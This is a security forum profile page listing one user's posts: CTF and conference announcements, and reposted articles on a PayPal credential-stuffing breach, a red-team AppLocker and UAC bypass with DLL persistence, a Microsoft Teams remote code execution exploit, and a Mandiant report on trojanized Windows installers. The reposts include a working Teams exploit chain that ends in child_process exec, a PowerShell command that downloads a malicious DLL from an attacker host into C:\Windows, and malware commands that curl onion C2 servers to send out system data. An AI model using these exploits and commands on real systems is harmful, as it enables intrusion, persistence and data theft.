Jump to content

Nytro

Administrators
  • Posts

    18719
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Nytro

    RSTCon #3 - CTF

    Platforma pentru CTF este disponibilă. Înregistrările sunt deschise: https://ctf.rstcon.com/ Premiile pentru concurs: Locul I 4000 RON Locul II 2000 RON Locul III 1000 RON Cel mai bun write-up 500 RON Premiile sunt oferite din donații de la membrii comunității. Cei care ne pot ajuta cu o donație sunt rugați să ne contacteze la contact@rstcon.com. Astfel există posibilitatea ca valoarea premiilor să fie mai mare. De asemenea, dacă doriți să ne sprijiniți prin crearea unor exerciții CTF, indiferent de gradul de dificultate sau de tematica abordată, așteptăm un email la contact@rstcon.com. Pentru discuții referitoare la CTF vom folosi canalul #ctf de pe Discord. Prezentarea rezultatelor concursului va avea loc la ora 16:00 pe Discord. Informatii complete: https://rstcon.com/ctf/ Revin cu detalii.
  2. RST Con este o conferință online, gratuită, în limba română, adusă la viață de către comunitatea RST. Conferința va avea loc pe 27-28 aprilie 2023 de la 10:00 la 17:00 iar concursul CTF va avea loc de pe 29 aprilie 2023 ora 10:00 până pe 30 aprilie 2023 la ora 17:00. Conferința se va desfășura folosind platforma Zoom. Înregistrarea și accesarea evenimentului este disponibilă la următoarea adresă: RSTCon #3 – 27 aprilie – Ziua I: https://us02web.zoom.us/webinar/register/WN_xKDZ0iklTjWeWcaH34VNsQ RSTCon #3 – 28 aprilie – Ziua II: https://us02web.zoom.us/webinar/register/WN_0Y7IwXCjR4-U1Fcvyj4R9w Vă rugăm să rețineți că evenimentele Zoom sunt diferite în cele două zile. Linkedin: https://www.linkedin.com/events/rstcon-37035364565479473152/about/ Informatii complete pe https://rstcon.com/ Revin cu informatii.
  3. Eu am 3 doze de vaccin si din cauza lui am murit de vreo 2 ori.
  4. Nice, in teorie puteai sa il duci in RCE, dar probabil au tot bagat mitigations. Sa ne zici cat dau pe el.
  5. Nytro

    Fun stuff

    https://9gag.com/gag/a4oEMp1
  6. PayPal accounts breached in large-scale credential stuffing attack By Bill Toulas January 19, 2023 PayPal is sending out data breach notifications to thousands of users who had their accounts accessed through credential stuffing attacks that exposed some personal data. Credential stuffing are attacks where hackers attempt to access an account by trying out username and password pairs sourced from data leaks on various websites. This type of attack relies on an automated approach with bots running lists of credentials to "stuff" into login portals for various services. Credential stuffing targets users that employ the same password for multiple online accounts, which is known as "password recycling." Close to 35,000 users impacted PayPal explain that the credential stuffing attack occurred between December 6 and December 8, 2022. The company detected and mitigated it at the time but also started an internal investigation to find out how the hackers obtained access to the accounts. By December 20, 2022, PayPal concluded its investigation, confirming that unauthorized third parties logged into the accounts with valid credentials. The electronic payments platform claims that this was not due to a breach on its systems and has no evidence that the user credentials were obtained directly from them. According to the data breach reporting from PayPal, 34,942 of its users have been impacted by the incident. During the two days, hackers had access to account holders' full names, dates of birth, postal addresses, social security numbers, and individual tax identification numbers. Transaction histories, connected credit or debit card details, and PayPal invoicing data are also accessible on PayPal accounts. PayPal says it took timely action to limit the intruders' access to the platform and reset the passwords of accounts confirmed to have been breached. Also, the notification claims that the attackers have not attempted or did not manage to perform any transactions from the breached PayPal accounts. "We have no information suggesting that any of your personal information was misused as a result of this incident, or that there are any unauthorized transactions on your account," reads PayPal's notification to impacted users. "We reset the passwords of the affected PayPal accounts and implemented enhanced security controls that will require you to establish a new password the next time you log in to your account" - PayPal Impacted users will receive a free-of-charge two-year identity monitoring service from Equifax. The company strongly recommends that recipients of the notices change the passwords for other online accounts using a unique and long string. Typically, a good password is at least 12-characters long and includes alphanumeric characters and symbols. Moreover, PayPal advises users to activate two-factor authentication (2FA) protection from the 'Account Settings' menu, which can prevent an unauthorized party from accessing an account, even if they have a valid username and password. Sursa: https://www.bleepingcomputer.com/news/security/paypal-accounts-breached-in-large-scale-credential-stuffing-attack/
      • 1
      • Upvote
  7. assume-breach Jan 20 Home Grown Red Team: Bypassing Applocker, UAC, and Getting Administrative Persistence Welcome back! In my previous post, I showed how we can bypass default Applocker rules using LNK files to get a Havoc beacon. In this installment, we’re going to bypass UAC and gain administrative persistence on a target without dropping EXEs to disk. Pretty cool, right? Getting Started If you haven’t read my previous post, you can find it here: Bypassing Applocker Using LNK Files. That post is going to show you how to set up your Powershell scripts, LNK file and so forth for initial access to the target. Since we still have access to our target, we’re going to start where we ended in our last article. Here’s the scenario: We have an administrative beacon in medium integrity through Havoc C2. You’ll notice that the process is Powershell. If we had used process injection in our shellcode dropper, we would have migrated to a different process like Explorer.exe or ApplicationFrameHost.exe (just something to think about). Running a “whoami” we see that our user, david, is part of the administrators group. In order for our persistence method to work, we need local admin. The reason being that we need access to “C:\Windows\” and this isn’t accessible to domain users or administrators unless we are in a high integrity beacon/process. So since this user is an admin, we can perform a UAC bypass. For this task, I prefer to use my own tool, HighBorn. HighBorn utilizes the Windows mock directory vulnerability to side load a DLL and execute it in high integrity. Using A UAC Bypass To Perform Administrative Actions A typical UAC Bypass is performed to get a high integrity beacon back to a C2. However, we can use HighBorn to perform administrative tasks on execution instead of getting a high integrity beacon. Let’s discuss the typical UAC Bypass to get a beacon back to Havoc. This is the usual workflow: Target downloads malicious EXE . 2. We run HighBorn in memory using inline-execute. 3. HighBorn performs the UAC Bypass and calls the EXE in high integrity. 4. We get a high integrity beacon. Since we are bypassing Applocker protections, we don’t have a dropper on disk. Remember, our beacon is running through a Powershell process. The UAC Bypass performs administrative code execution so we can tailor this to our needs. Since our need for this POC is persistence, we can change our execution from calling a malicious EXE to downloading a malicious DLL. DLL Side Loading For Persistence I’ve seen a few posts on this, mainly on LinkedIn, but there is a pretty popular DLL side loading vulnerability in Windows File Explorer. If you craft a malicious DLL and name it cscapi.dll, you can place it in C:\Windows\ and it will get executed when the user logs in. The caveat to this is that you must have local admin privileges to gain access to C:\Windows\. So let’s begin by creating a malicious DLL. Creating The Malicious DLL To create a malicious DLL, I prefer to use my own tool, Harriet. We choose option 2 to create our DLL. We then choose option 1 (the only option for now) and then we input all of our values. I chose to inject into Explorer.exe (you might want to change this process if you’re on a real pentest) and I named my DLL appropriately for the exploit. Modifying HighBorn.cs For Administrative Actions Now we need to craft a command to call out to cscapi.dll and download it into C:\Windows\. This is where HighBorn comes in. I navigate to the HighBorn folder and edit the HighBorn.c file. As you can see from the screenshot, this is a very simple DLL. We can use a easy Powershell command to download our cscapi.dll file into the Windows folder. powershell -Sta -Nop -Window Hidden iwr -Uri ‘http://IP:PORT/cscapi.dll' -Outfile ‘C:\Windows\cscapi.dll’ However, if we try to compile this, we get escape sequence errors. Let’s encode our command into Base64 using Powershell. $str= “powershell -Sta -Nop -Window Hidden iwr -Uri ‘http://IP:PORT/cscapi.dll' -Outfile ‘C:\Windows\cscapi.dll’ [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) Now we should have a good Base64 string. Let’s add it to HighBorn.c file. We then compile it per the command in the ReadMe.md file in the HighBorn folder. x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl, — subsystem,windows Now we have a secur32.dll file. In the HighBorn.cs file, we modify the exploit to put our IP and port to pull secur32.dll. Then we can compile HighBorn.exe with this command. mcs HighBorn.cs /out:HighBorn.exe We host secur32.dll and run our command in Havoc. On our python server, we see it pull secur32.dll and then it pulls our cscapi.dll file! Moving to our Windows folder on the target, we see that it has our DLL in place. Now remember, our cscapi.dll is a malicious DLL that will inject shellcode into Explorer.exe on login. Let’s reboot the target and see if we get a shellback. If all goes well, we should get a beacon in the Explorer.exe process on Havoc. And as user david logs in, we have our beacon! Pretty cool persistence technique! The biggest con to this technique is that you need admin privileges. However, if you can crack an admin password you can perform this technique on any user’s system for persistence on multiple workstations in the environment without having to drop an EXE to disk. Hopefully you found this article helpful or at least interesting. If you like my content you can follow me on here or on Twitter @assume_breach Sursa: https://assume-breach.medium.com/home-grown-red-team-bypassing-applocker-uac-and-getting-administrative-persistence-88b85c81343e
      • 2
      • Thanks
      • Upvote
  8. 2022 Microsoft Teams RCE Jan 16, 2023 Me (@adm1nkyj1) and jinmo123 of theori(@jinmo123) participated pwn2own 2022 vancouver but we failed because of time allocation issue but our bug and the exploit was really cool so decided to share on blog! Executive Summary The deeplink handler for /l/task/:appId in Microsoft Teams can load an arbitrary url in webview/iframe. Attacker can leaverage this with teams RPC’s functionality to get code execution outside the sandbox. 1. URL allowlist bypass using url encoding URL Route example ... k(p.states.appDeepLinkTaskModule, { url: "l/task/:appId?url&height&width&title&fallbackURL&card&completionBotId" }), k(p.states.appSfbFreQuickStartVideo, { url: "sfbfrequickstartvideo" }), k(p.states.appDeepLinkMeetingCreate, { url: "l/meeting/new?meetingType&groupId&tenantId&deeplinkId&attendees&subject&content&startTime&endTime&nobyoe&qsdisclaimer" }), k(p.states.appDeepLinkMeetingDetails, { url: "l/meeting/:tenantId/:organizerId/:threadId/:messageId?deeplinkId&nobyoe&qsdisclaimer" }), k(p.states.appDeepLinkMeetingDetailsEventId, { url: "l/meeting/details?eventId&deeplinkId" }), k(p.states.appDeepLinkVirtualEventCreate, { url: "l/virtualevent/new?eventType" }), k(p.states.appDeepLinkVirtualEventDetails, { url: "l/virtualevent/:eventId" }), ... In Microsoft Teams, there is a url route handler for /l/task/:appId which accepts url as a parameter. This allows chat bot created by Teams applications to send a link to user, which should be in the url allowlist. The allowlist is constructed from various fields of app definition: a = angular.isDefined(e.validDomains) ? _.clone(e.validDomains) : []; return e.galleryTabs && a.push.apply(a, _.map(e.galleryTabs, function (e) { return i.getValidDomainFromUrl(e.configurationUrl) })), e.staticTabs && a.push.apply(a, _.map(e.staticTabs, function (e) { return i.getValidDomainFromUrl(e.contentUrl) })), e.connectors && a.push.apply(a, _.map(e.connectors, function (e) { return i.utilityService.parseUrl(e.configurationUrl).host These domains are converted into regular expressions, and are used to validate the url: … www.office.com www.github.com … ```js ... t.prototype.isUrlInDomainList = function(e, t, n) { void 0 === n && (n = !1); for (var i = n ? e : this.parseUrl(e).href, s = 0; s < t.length; s++) { for (var a = "", r = t[s].split("."), o = 0; o < r.length; o++) a += (o > 0 ? "[.]" : "") + r[o].replace("*", "[^/^.]+"); var c = new RegExp("^https://" + a + "((/|\\?).*)?$","i"); if (e.match(c) || i.match(c)) return !0 } return !1 } ... Regardless of the third parameter n, if the original url matches the given regular expression, this check is passed. After checking the url, instead, the parsed form (parseUrl) is passed to webview. e.prototype.setContainerUrl = function(e) { var t = this; this.sdkWindowMessageHandler && (this.sdkWindowMessageHandler.destroy(), this.sdkWindowMessageHandler = null); var n = this.utilityService.parseUrl(e); this.$q.when(this.htmlSanitizer.sanitizeUrl(n.href, ["https"])).then(function(e) { t.frameSrc = e }) } This is problematic because parseUrl of utilityService url-decodes the url; the check is done on the original, url-encoded url. Especially, when an allowlisted domain contains wildcard e.g. *.office.com, the generated regular expression is /^https://[^/^.]+[.]office[.]com((/|\?).*)?$/i. The wildcard becomes [^/^.]+, but if the given url is https://attacker.com%23.office.com, the check is passed. However, after decoding the url, this becomes https://attacker.com#.office.com, which loads attacker.com instead. Microsoft Planner app (appId: 1ded03cb-ece5-4e7c-9f73-61c375528078) has a domain with wildcard in its validDomains field: { "manifestVersion": "1.7", "version": "0.0.19", "categories": [ "Microsoft", "Productivity", "ProjectManagement" ], "disabledScopes": [ "PrivateChannel" ], "developerName": "Microsoft Corporation", "developerUrl": "https://tasks.office.com", "privacyUrl": "https://privacy.microsoft.com/privacystatement", "termsOfUseUrl": "https://www.microsoft.com/servicesagreement", "validDomains": [ "tasks.teams.microsoft.com", "retailservices.teams.microsoft.com", "retailservices-ppe.teams.microsoft.com", "tasks.office.com", "*.office.com" ], ... } As a result, this bug allows the attacker to load an arbitrary location into a webview. PoC: https://teams.live.com/_#/l/task/1ded03cb-ece5-4e7c-9f73-61c375528078?url=https://attacker.com%23.office.com/&height=100&width=100&title=hey&fallbackURL=https://aka.ms/hey&completionBotId=1&fqdn=teams.live.com 2. pluginHost allows dangerous RPC calls from any webview Since contextIsolation is not enabled on the webview, attacker can leverage prototype pollution to invoke arbitrary electron IPC calls to processes (see Appendix section). Given this primitive, attacker can invoke 'calling:teams:ipc:initPluginHost' IPC call of main process, which gives the id of the pluginHost window. pluginHost exposes dangerous RPC calls to any webview e.g. returning a member of ‘registered objects’, calling them, and importing some allowlisted modules. lib/pluginhost/preload.js: // n, o is controllable P(c.remoteServerMemberGet, (e, t, n, o) => { const i = s.objectsRegistry.get(n); if (null == i) throw new Error( `Cannot get property '${o}' on missing remote object ${n}` ); return A(e, t, () => i[o]); }), // n, o, i is controllable P(c.remoteServerMemberCall, (e, t, n, o, i) => { i = v(e, t, i); const r = s.objectsRegistry.get(n); if (null == r) throw new Error( `Cannot call function '${o}' on missing remote object ${n}` ); return A(e, t, () => r[o](...i)); }), Attacker can get the constructor of any objects, and the constructor of the constructor (Function) to compile arbitrary JavaScript code, and call the compiled function. [_,pluginHost]=ipc.sendSync('calling:teams:ipc:initPluginHost', []); msg=ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_GET', [{hey: 1}, 1, 'constructor', []], '')[0].id msg=ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{hey: 1}, msg, 'constructor', [{type: 'value', value: 'alert()'}]], '')[0].id require() is not exposed to the script itself, but the attacker-controlled script can overwrite prototype of String, which is useful in this code: function loadSlimCore(slimcoreLibPath) { let slimcore; if (utility.isWebpackRuntime()) { const slimcoreLibPathWebpack = slimcoreLibPath.replace(/\\/g, "\\\\"); slimcore = eval(`require('${slimcoreLibPathWebpack}')`); ... } ... function requireEx(e, t) { ... const { slimCoreLibPath: n, error: o } = electron_1.ipcRenderer.sendSync( constants.events.calling.getSlimCoreLibInfo ); if (o) throw new Error(o); if (t === n) return loadSlimCore(n); // n === 'slimcore' throw new Error("Invalid module: " + t); } // y === requireEx P(c.remoteServerRequire, (e, t, n) => A(e, t, () => y(e, n))), If the attacker calls remoteServerRequire with 'slimcore' as an argument, the pluginHost evaluates string returned by String.prototype.replace. Therefore, the following code can invoke require with arbitrary arguments, and call methods in the module. msg=ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{hey: 1}, msg, 'constructor', [{type: 'value', value: 'var backup=String.prototype.replace; String.prototype.replace = ()=>"slimcore\');require(`child_process`).exec(`calc.exe`);(\'";'}]], '')[0].id ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_FUNCTION_CALL', [{hey: 1}, msg, []], '') ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{hey: 1}, 'slimcore'], '') By using child_process module, attacker can execute any program. Appendix A: Accessing any bundled modules when contextIsolation is not enabled between preload script and web pages Electron compiles and executes a script named sandbox_bundle.js in every sandboxed frame, and it registers a handler that shows security warnings if user wants. To enable the security warning, users can set ELECTRON_ENABLE_SECURITY_WARNINGS either in environment variables or window. lib/renderer/security-warnings.ts#L43-L46: if ((env && env.ELECTRON_ENABLE_SECURITY_WARNINGS) || (window && window.ELECTRON_ENABLE_SECURITY_WARNINGS)) { shouldLog = true; } This is called on ‘load’ event of the window: export function securityWarnings (nodeIntegration: boolean) { const loadHandler = async function () { if (shouldLogSecurityWarnings()) { const webPreferences = await getWebPreferences(); logSecurityWarnings(webPreferences, nodeIntegration); } }; window.addEventListener('load', loadHandler, { once: true }); } security-warnings.ts is also bundled to sandbox_bundle.js using webpack. There is an import of webFrame, which lazily loads the “./lib/renderer/api/web-frame.ts”. import { webFrame } from 'electron'; ... const isUnsafeEvalEnabled = () => { return webFrame._isEvalAllowed(); }; // this is called by warnAboutInsecureCSP + logSecurityWarnings This is done by electron.ts: import { defineProperties } from '@electron/internal/common/define-properties'; import { moduleList } from '@electron/internal/sandboxed_renderer/api/module-list'; module.exports = {}; defineProperties(module.exports, moduleList); In define-properties.ts, it defines getter for all modules in moduleList; loader is invoked when a module e.g. webFrame is accessed. const handleESModule = (loader: ElectronInternal.ModuleLoader) => () => { const value = loader(); if (value.__esModule && value.default) return value.default; return value; }; // Attaches properties to |targetExports|. export function defineProperties (targetExports: Object, moduleList: ElectronInternal.ModuleEntry[]) { const descriptors: PropertyDescriptorMap = {}; for (const module of moduleList) { descriptors[module.name] = { enumerable: !module.private, get: handleESModule(module.loader) }; } return Object.defineProperties(targetExports, descriptors); } The loader for webFrame is defined in the moduleList: export const moduleList: ElectronInternal.ModuleEntry[] = [ { ... { name: 'webFrame', loader: () => require('@electron/internal/renderer/api/web-frame') }, Which is compiled as: }, { name: "webFrame", loader: ()=>r(/*! @electron/internal/renderer/api/web-frame */ "./lib/renderer/api/web-frame.ts") }, { The function r above is __webpack_require__, which actually loads the module if not loaded yet. function __webpack_require__(r) { if (t[r]) return t[r].exports; Here, t is the list of cached modules. If the module is not loaded by any code, t[r] is undefined. Also, t.__proto__ points Object.prototype, so attacker can install getter for the module path to get the whole list of cached modules. const KEY = './lib/renderer/api/web-frame.ts'; let modules; Object.prototype.__defineGetter__(KEY, function () { console.log(this); modules = this; delete Object.prototype[KEY]; main(); }) This enables attacker to get the @electron/internal/renderer/api/ipc-renderer module to send any IPCs to any processes. var ipc = modules['./lib/renderer/api/ipc-renderer.ts'].exports.default; [_, pluginHost] = ipc.sendSync('calling:teams:ipc:initPluginHost', []); We utilized this to send IPC to pluginHost (see Section 2), and execute a program outside the sandbox. Exploit Client : https://teams.live.com/l/task/1ded03cb-ece5-4e7c-9f73-61c375528078?url=https://0e1%2Ekr\cd2c4753c4cb873c7be66e3ffdeae71f71ce33482e9921bab01dc3670a3b4f95\%23.office.com/&height=100&width=100&title=hey&fallbackURL=https://aka.ms/hey&completionBotId=&fqdn=teams.live.com Server : <script> const KEY = './lib/renderer/api/web-frame.ts'; let modules; Object.prototype.__defineGetter__(KEY, function () { console.log(this); modules = this; delete Object.prototype[KEY]; main(); }) window.ELECTRON_ENABLE_SECURITY_WARNINGS = true; function main() { var ipc = modules['./lib/renderer/api/ipc-renderer.ts'].exports.default; [_, pluginHost] = ipc.sendSync('calling:teams:ipc:initPluginHost', []); msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{ hey: 1 }, 'slimcore'], '')[0] msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_GET', [{ hey: 1 }, msg.id, 'constructor', []], '')[0] msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{ hey: 1 }, msg.id, 'constructor', [{ type: 'value', value: 'var backup=String.prototype.replace; String.prototype.replace = ()=>"slimcore\');require(`child_process`).exec(`calc.exe`);(\'";' }]], '')[0] ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_FUNCTION_CALL', [{ hey: 1 }, msg.id, []], '') msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{ hey: 1 }, 'slimcore'], '') } </script> Sursa: https://blog.pksecurity.io/2023/01/16/2022-microsoft-teams-rce.html
      • 1
      • Upvote
  9. Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government MANDIANT INTELLIGENCE DEC 15, 2022 16 MIN READ Executive Summary Mandiant identified an operation focused on the Ukrainian government via trojanized Windows 10 Operating System installers. These were distributed via torrent sites in a supply chain attack. Threat activity tracked as UNC4166 likely trojanized and distributed malicious Windows Operating system installers which drop malware that conducts reconnaissance and deploys additional capability on some victims to conduct data theft. The trojanized files use the Ukrainian language pack and are designed to target Ukrainian users. Following compromise targets selected for follow on activity included multiple Ukrainian government organizations. At this time, Mandiant does not have enough information to attribute UNC4166 to a sponsor or previously tracked group. However, UNC4166’s targets overlap with organizations targeted by GRU related clusters with wipers at the outset of the war. Threat Detail Mandiant uncovered a socially engineered supply chain operation focused on Ukrainian government entities that leveraged trojanized ISO files masquerading as legitimate Windows 10 Operating System installers. The trojanized ISOs were hosted on Ukrainian- and Russian-language torrent file sharing sites. Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset of victims, additional tools are deployed to enable further intelligence gathering. In some instances, we discovered additional payloads that were likely deployed following initial reconnaissance including the STOWAWAY, BEACON, and SPAREPART backdoors. One trojanized ISO “Win10_21H2_Ukrainian_x64.iso” (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) uses the Ukrainian Language pack and could be downloaded from “https://toloka[.]to/t657016#1873175.” The Toloka site is focused on a Ukrainian audience and the image uses the Ukrainian language (Figure 1). The same ISO was observed being hosted on a Russian torrent tracker (https://rutracker[.]net/forum/viewtopic.php?t=6271208) using the same image. The ISO contained malicious scheduled tasks that were altered and identified on multiple systems at three different Ukrainian organizations beaconing to .onion TOR domains beginning around mid-July 2022. Figure 1: Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) Attribution and Targeting Mandiant is tracking this cluster of threat activity as UNC4166. We believe that the operation was intended to target Ukrainian entities, due to the language pack used and the website used to distribute it. The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest. Mandiant has not uncovered links to previously tracked activity, but believes the actor behind this operation has a mandate to steal information from the Ukrainian government. The organizations where UNC4166 conducted follow on interactions included organizations that were historically victims of disruptive wiper attacks that we associate with APT28 since the outbreak of the invasion. This ISO was originally hosted on a Ukrainian torrent tracker called toloka.to by an account “Isomaker” which was created on the May 11, 2022. The ISO was configured to disable the typical security telemetry a Windows computer would send to Microsoft and block automatic updates and license verification. There was no indication of a financial motivation for the intrusions, either through the theft of monetizable information or the deployment of ransomware or cryptominers. Outlook and Implications Supply chain operations can be leveraged for broad access, as in the case of NotPetya, or the ability to discreetly select high value targets of interest, as in the SolarWinds incident. These operations represent a clear opportunity for operators to get to hard targets and carry out major disruptive attack which may not be contained to conflict zone. For more research from Google Cloud on securing the supply chain, see this Perspectives on Security report. Technical Annex Mandiant identified several devices within Ukrainian Government networks which contained malicious scheduled tasks that communicated to a TOR website from around July 12th, 2022. These scheduled tasks act as a lightweight backdoor that retrieves tasking via HTTP requests to a given command and control (C2) server. The responses are then executed via PowerShell. From data collated by Mandiant, it appears that victims are selected by the threat actor for further tasking. In some instances, we discovered devices had additional payloads that we assess were deployed following initial reconnaissance of the users including the deployment of the STOWAWAY and BEACON backdoors. STOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication like SSH, socks5. Backdoor component supports upload and download of files, remote shell and basic information gathering. BEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. Supported backdoor commands include shell command execution, file transfer, file execution, and file management. BEACON can also capture keystrokes and screenshots as well as act as a proxy server. BEACON may also be tasked with harvesting system credentials, port scanning, and enumerating systems on a network. BEACON communicates with a C2 server via HTTP or DNS. The threat actor also began to deploy secondary toehold backdoors in the environment including SPAREPART, likely as a means of redundancy for the initial PowerShell bootstraps. SPAREPART is a lightweight backdoor written in C that uses the device’s UUID as a unique identifier for communications with the C2. Upon successful connection to a C2, SPAREPART will download the tasking and execute it through a newly created process. Details Infection Vector Mandiant identified multiple installations of a trojanized ISO, which masquerades as a legitimate Windows 10 installer using the Ukrainian Language pack with telemetry settings disabled. We assess that the threat actor distributed these installers publicly, and then used an embedded schedule task to determine whether the victim should have further payloads deployed. Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) Malicious trojanized Windows 10 installer Downloaded from https://toloka.to/t657016#1873175 Forensic analysis on the ISO identified the changes made by UNC4166 that enables the threat actor to perform additional triage of victim accounts: Modification of the GatherNetworkInfo and Consolidator Schedule Tasks The ISO contained altered GatherNetworkInfo and Consolidator schedule tasks, which added a secondary action that executed the PowerShell downloader action. Both scheduled tasks are legitimate components of Windows and execute the gatherNetworkInfo.vbs script or waqmcons.exe process. Figure 2: Legitimate GatherNetworkInfo task configuration The altered tasks both contained a secondary action that was responsible for executing a PowerShell command. This command makes use of the curl binary to download a command from the C2 server, then the command is executed through PowerShell. The C2 servers in both instances were addresses to TOR gateways. These gateways advertise as a mechanism for users to access TOR from the standard internet (onion.moe, onion.ws). These tasks act as the foothold access into compromised networks, allowing UNC4166 to conduct reconnaissance on the victim device to determine networks of value for follow on threat activity. Figure 3: Trojanized GatherNetworkInfo task configuration Based on forensic analysis of the ISO file, Mandiant identified that the compromised tasks were both edited as follows: C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d) Last edit date: 2022-05-11 12:58:55 Executes: powershell.exe (curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID))) C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf) Last edit date: 2022-05-11 12:58:12 Executes: powershell.exe curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H ('h:'+(wmic csproduct get UUID)) | powershell.exe Note: At the time of analysis, the onion[.]ws C2 server is redirecting requests to legitimate websites. Software Piracy Script The ISO contained an additional file not found in standard Windows distributions called SetupComplete.cmd. SetupComplete is a Windows batch script that is configured to be executed upon completion of the Windows installation but before the end user is able to use the device. The script appears to be an amalgamation of multiple public scripts including remove_MS_telemetry.cmd by DeltoidDelta and activate.cmd by Poudyalanil (originally wiredroid) with the addition of a command to disable OneDriveSetup which was not identified in either script. The script is responsible for disabling several legitimate Windows services and tasks, disabling Windows updates, blocking IP addresses and domains related to legitimate Microsoft services, disabling OneDrive and activating the Windows license. Forensic artifacts led Mandiant to identify three additional scripts that were historically on the image, we assess that over time the threat actor has made alterations to these files. SetupComplete.cmd (MD5: 84B54D2D022D3DF9340708B992BF6669) Batch script to disable legitimate services and activate Windows File currently hosted on ISO SetupComplete.cmd (MD5: 67C4B2C45D4C5FD71F6B86FA0C71BDD3) Batch script to disable legitimate services and activate Windows File recovered through forensic file carving SetupComplete.cmd (MD5: 5AF96E2E31A021C3311DFDA200184A3B) Batch script to disable legitimate services and activate Windows File recovered through forensic file carving Victim Identification Mandiant assesses that the threat actor performs initial triage of compromised devices, likely to determine whether the victims were of interest. This triage takes place using the trojanized schedule tasks. In some cases, the threat actor may deploy additional capability for data theft or new persistence backdoors, likely for redundancy in the cases of SPAREPART or to enable additional tradecraft with BEACON and STOWAWAY. The threat actor likely uses the device’s UUID as a unique identifier to track victims. This unique identifier is transferred as a header in all HTTP requests both to download tasking and upload stolen data/responses. The threat actor’s playbook appears to follow a distinct pattern: Execute a command Optionally, filter or expand the results Export the results to CSV using the Export-Csv command and write to the path sysinfo (%system32%\sysinfo) Optionally, compress the data into sysinfo.zip (%system32%\sysinfo.zip) Optionally, upload the data instantaneously to the C2 (in most cases this is a separate task that is executed at the next beacon). Mandiant identified the threat actor exfiltrate data containing system information data, directory listings including timestamps and device geo-location. A list of commands used can be found in the indicators section. Interestingly, we did uncover a command that didn’t fit the aforementioned pattern in at least one instance. This command was executed on at least one device where the threat actor had access for several weeks. curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H h:filefile-file-file-file-filefilefile –output temp.zip Although we were not able to discover evidence that temp.zip was executed or recover the file, we were able to identify the content of the file directly from the C2 during analysis. This command is likely an alternative mechanism for the threat actor to collect the system information for the current victim, although it’s unclear why they wouldn’t deploy the command directly.. chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -H (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo The download command is notable as the threat actor uses a hardcoded UUID (filefile-file-file-file-filefilefile), which we assess is likely a default value. It’s unclear why the threat actor performed this additional request in favor of downloading the command itself; we believe this may be used as a default command by the threat actors. Follow On Tasking If UNC4166 determined a device likely contained intelligence of value, subsequent actions were take on these devices. Based on our analysis, the subsequent tasking fall into three categories: Deployment of tools to enable exfiltration of data (like TOR and Sheret) Deployment of additional lightweight backdoors likely to provide redundant access to the target (like SPAREPART) Deployment of additional backdoors to enable additional functionality (like BEACON and STOWAWAY) TOR Browser Downloaded In some instances, Mandiant identified that the threat actor attempted to download the TOR browser onto the victim’s device. This was originally attempted through downloading the file directly from the C2 via curl. However, the following day the actor also downloaded a second TOR installer directly from the official torprojects.org website. It’s unclear why the threat actor performed these actions as Mandiant was unable to identify any use of TOR on the victim device, although this would provide the actor a second route to communicate with infrastructure through TOR or may be used by additional capability as a route for exfiltration. We also discovered the TOR installer was also hosted on some of the backup infrastructure, which may indicate the C2 URLs resolve to the same device. bundle.zip (MD5: 66da9976c96803996fc5465decf87630) Legitimate TOR Installer bundle Downloaded from https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe/bundle.zip Downloaded from https:// 56nk4qmwxcdd72yiaro7bxixvgf5awgmmzpodub7phmfsqylezu2tsid.onion[.]moe/bundle.zip Use of Sheret HTTP Server and localhost[.]run In some instances, the threat actor deployed a publicly available HTTP server called Sheret to conduct data theft interactively on victim devices. The threat actor configured Sheret to server locally, then using SSH created a tunnel from the local device to the service localhost[.]run. In at least one instance, this web server was used for serving files on a removable drive connected to the victim device and Mandiant was able to confirm that multiple files were exfiltrated via this mechanism. The command used for SSH tunnelling 